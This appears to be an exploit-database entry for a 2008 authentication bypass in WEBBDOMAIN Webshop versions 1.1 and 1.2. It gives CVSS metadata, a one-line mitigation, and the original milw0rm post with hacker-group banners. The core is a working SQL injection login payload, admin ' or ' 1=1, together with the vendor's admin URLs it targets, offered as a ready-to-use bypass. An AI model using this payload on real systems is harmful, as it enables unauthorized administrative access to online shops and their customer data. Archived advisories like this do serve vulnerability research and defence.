WEBBDOMAIN Webshop Auth Bypass All Version

vendor:

Webshop

by:

Hakxer

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Webshop

Affected Version From: V1.1

Affected Version To: V1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:webbdomain:webshop

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

WEBBDOMAIN Webshop Auth Bypass All Version

A vulnerability in WEBBDOMAIN Webshop allows an attacker to bypass authentication by using the username 'admin' or '1=1' and the password 'Hakxer'. This vulnerability affects all versions of the software.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.

Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/
        /____/       EgY Coders Vulnerability Research TM                                    

# [~] Discovered by : Hakxer
# [~] Type Gap : WEBBDOMAIN Webshop Auth Bypass All Version
# [~] Script :http://webbdomain.com/php/webshopir/~~All Version ~~
# [~] Greetz : Allah
##########################################################################

|| Auth Bypass ||

http://webbdomain.com/php/webshopir/admin V1.2
http://webbdomain.com/php/webshop/admin V 1.1

Username : admin ' or ' 1=1
password : Hakxer

Logged In ...

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-04]